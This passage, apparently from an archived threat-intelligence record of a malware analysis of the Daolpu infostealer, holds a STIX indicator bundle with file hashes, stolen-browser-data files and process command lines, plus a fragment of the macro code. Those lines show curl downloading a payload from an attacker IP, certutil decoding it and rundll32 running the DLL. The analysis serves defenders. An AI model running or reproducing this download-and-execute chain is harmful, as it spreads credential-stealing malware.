\"file--26d5f6ec-cc77-4162-bdff-401a515689d7\",\r\n      \"name\": \"mscorsvc.dll\",\r\n      \"hashes\": {\r\n        \"SHA-256\": \"3a9323a939fbecbc6d0ceb5c1e1f3ebde91e9f186b46fdf3ba1aee03d1d41cd8\"\r\n      },\r\n      \"mime_type\": \"application/x-msdownload\"\r\n    },\r\n    {\r\n      \"type\": \"file\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"file--ea34c3fe-1d5b-4cf6-92e1-7e02cd878242\",\r\n      \"name\": \"mscorsvc.dll\",\r\n      \"hashes\": {\r\n        \"SHA-256\": \"f0fce67c1f360d045c21249f6faaac4d64b36aad02c8b877ab7db1e35f7c71f5\"\r\n      },\r\n      \"mime_type\": \"application/x-msdownload\"\r\n    },\r\n    {\r\n      \"type\": \"relationship\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"relationship--621277c3-198e-4c9a-b91b-ed54eacd33de\",\r\n      \"relationship_type\": \"impersonates\",\r\n      \"source_ref\": \"campaign--c014b573-2a94-4c09-aaf9-2c5330dedb06\",\r\n      \"target_ref\": \"identity--bdc38620-34da-418b-9b72-fc1ae34b398f\"\r\n    },\r\n    {\r\n      \"type\": \"relationship\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"relationship--2841bbbc-adf0-4b6e-be1c-ce76c953b06es\",\r\n      \"relationship_type\": \"uses\",\r\n      \"source_ref\": \"campaign--c014b573-2a94-4c09-aaf9-2c5330dedb06\",\r\n      \"target_ref\": \"malware--9823d959-beff-47e1-bfe5-74d029849d4e\"\r\n    },\r\n    {\r\n      \"type\": \"relationship\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"relationship--75cc4004-3430-4f6d-a62c-5a3ca02a30c4\",\r\n      \"relationship_type\": \"downloads\",\r\n      \"source_ref\": \"malware--9823d959-beff-47e1-bfe5-74d029849d4e\",\r\n      \"target_ref\": \"file--3ad05b73-3251-4b41-beca-5de1accc9a5e\"\r\n    },\r\n    {\r\n      \"type\": \"relationship\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"relationship--b394f377-bb13-4dea-848d-518ed6bef8b6\",\r\n      \"relationship_type\": \"communicates-with\",\r\n      \"source_ref\": \"malware--9823d959-beff-47e1-bfe5-74d029849d4e\",\r\n      \"target_ref\": \"url--af891d7d-9bcc-4fb4-9bed-5feb52908e24\"\r\n    },\r\n    {\r\n      \"type\": \"relationship\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"relationship--85dd37e7-4d4e-42db-b463-eef142ffdd9a\",\r\n      \"relationship_type\": \"communicates-with\",\r\n      \"source_ref\": \"malware--7b96a7fc-74ef-435a-bd34-17cb2b3f7712\",\r\n      \"target_ref\": \"url--0bae24fb-6bfd-483f-82a3-32cac7626dee\"\r\n    },\r\n    {\r\n      \"type\": \"directory\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"directory--fd88dfe8-15fe-44c7-9689-a50ba915e50c\",\r\n      \"path\": \"C:\\\\Windows\\\\Temp\"\r\n    },\r\n    {\r\n      \"type\": \"file\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"file--f2f79ab1-606c-47aa-8c6e-311e12612884\",\r\n      \"name\": \"result.txt\",\r\n      \"parent_directory_ref\": \"directory--fd88dfe8-15fe-44c7-9689-a50ba915e50c\",\r\n      \"created_by_ref\": \"malware--7b96a7fc-74ef-435a-bd34-17cb2b3f7712\"\r\n    },\r\n    {\r\n      \"type\": \"file\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"file--dab8547d-c3d8-4834-ac06-c24780f60838\",\r\n      \"name\": \"Login Data\",\r\n      \"parent_directory_ref\": \"directory--fd88dfe8-15fe-44c7-9689-a50ba915e50c\",\r\n      \"created_by_ref\": \"malware--7b96a7fc-74ef-435a-bd34-17cb2b3f7712\"\r\n    },\r\n    {\r\n      \"type\": \"file\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"file--f34cbe8f-218c-4673-8e14-25e5ed2db655\",\r\n      \"name\": \"cookies.sqlite\",\r\n      \"parent_directory_ref\": \"directory--fd88dfe8-15fe-44c7-9689-a50ba915e50c\",\r\n      \"created_by_ref\": \"malware--7b96a7fc-74ef-435a-bd34-17cb2b3f7712\"\r\n    },\r\n    {\r\n      \"type\": \"file\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"file--469da665-b4b2-433a-998e-cb3741de65b4\",\r\n      \"name\": \"cookies.sqlite-wal\",\r\n      \"parent_directory_ref\": \"directory--fd88dfe8-15fe-44c7-9689-a50ba915e50c\",\r\n      \"created_by_ref\": \"malware--7b96a7fc-74ef-435a-bd34-17cb2b3f7712\"\r\n    },\r\n    {\r\n      \"type\": \"file\",\r\n      \"spec_version\": \"2.1\",\r\n      \"id\": \"file--ffe729b5-823c-4133-b8ae-293320f4df0b\",\r\n      \"name\": \"cookies.sqlite-shm\",\r\n      \"parent_directory_ref\": \"directory--fd88dfe8-15fe-44c7-9689-a50ba915e50c\",\r\n 
\"created_by_ref\": \"malware--7b96a7fc-74ef-435a-bd34-17cb2b3f7712\"\r\n },\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 28 of 30\n\n{\r\n \"type\": \"file\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"file--e8c43b38-a0ac-4c1b-becb-a346dc0c60c9\",\r\n \"name\": \"cmd.exe\"\r\n },\r\n {\r\n \"type\": \"tool\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"tool--76ff81fb-fb47-425e-983a-65084ce2e790\",\r\n \"name\": \"command prompt\",\r\n \"object_refs\": \"file--e8c43b38-a0ac-4c1b-becb-a346dc0c60c9\"\r\n },\r\n {\r\n \"type\": \"relationship\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"relationship--fed44f3e-fed9-46b4-9b62-e06c76fca109\",\r\n \"relationship_type\": \"uses\",\r\n \"source_ref\": \"malware--9823d959-beff-47e1-bfe5-74d029849d4e\",\r\n \"target_ref\": \"tool--76ff81fb-fb47-425e-983a-65084ce2e790\"\r\n },\r\n {\r\n \"type\": \"process\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"process--3104b8b4-cd0a-4f74-b791-f66c4f85fa28\",\r\n \"image_ref\": \"file--e8c43b38-a0ac-4c1b-becb-a346dc0c60c9\",\r\n \"command_line\": \"cmd /c curl.exe http://172.104.160.126:8099/payload2.txt -o C:\\\\Users\\\\admin\\\\AppData\\\\Lo\r\n },\r\n {\r\n \"type\": \"process\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"process--c73793f7-3c5d-427d-9121-9e43064eb000\",\r\n \"image_ref\": \"file--e8c43b38-a0ac-4c1b-becb-a346dc0c60c9\",\r\n \"command_line\": \"cmd /c certutil -f -decode C:\\\\Users\\\\admin\\\\AppData\\\\Local\\\\Temp\\\\mscorsvc.txt C:\\\\Users\r\n },\r\n {\r\n \"type\": \"process\",\r\n \"spec_version\": \"2.1\",\r\n \"id\": \"process--c3a5ea9e-1981-44eb-8e26-1fe11cecdc0c\",\r\n \"image_ref\": \"file--e8c43b38-a0ac-4c1b-becb-a346dc0c60c9\",\r\n \"command_line\": \"cmd /c START \\\" \\\" rundll32 C:\\\\Users\\\\admin\\\\AppData\\\\Local\\\\Temp\\\\mscorsvc.dll,DllMain\"\r\n }\r\n 
]\r\n}\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 29 of 30\n\nSource: https://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nhttps://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/\r\nPage 30 of 30\n\nWith rngFirstParagraph .Delete       \n.InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + Chr\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + Ch\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + Chr\n.InsertParagraphAfter       \n.InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3)\n.InsertParagraphAfter       \n.InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + Ch\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + Ch\n\" \" + 
ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + Chr\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3)\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3)\n.InsertParagraphAfter       \n.InsertAfter Text:=ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + C\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3)\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + Chr\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3)\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3)\n\" \" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + \" \" + ChrW(-3) + ChrW(-3)\n   Page 21 of 30",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://tehtris.com/en/blog/daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage/"
	],
	"report_names": [
		"daolpu-infostealer-full-analysis-of-the-latest-malware-exploited-post-crowdstrike-outage"
	],
	"threat_actors": [],
	"ts_created_at": 1775791283,
	"ts_updated_at": 1775826704,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/064281f0893bf17ff0aac2cf83baf81fd68b7d0f.pdf",
		"text": "https://archive.orkl.eu/064281f0893bf17ff0aac2cf83baf81fd68b7d0f.txt",
		"img": "https://archive.orkl.eu/064281f0893bf17ff0aac2cf83baf81fd68b7d0f.jpg"
	}
}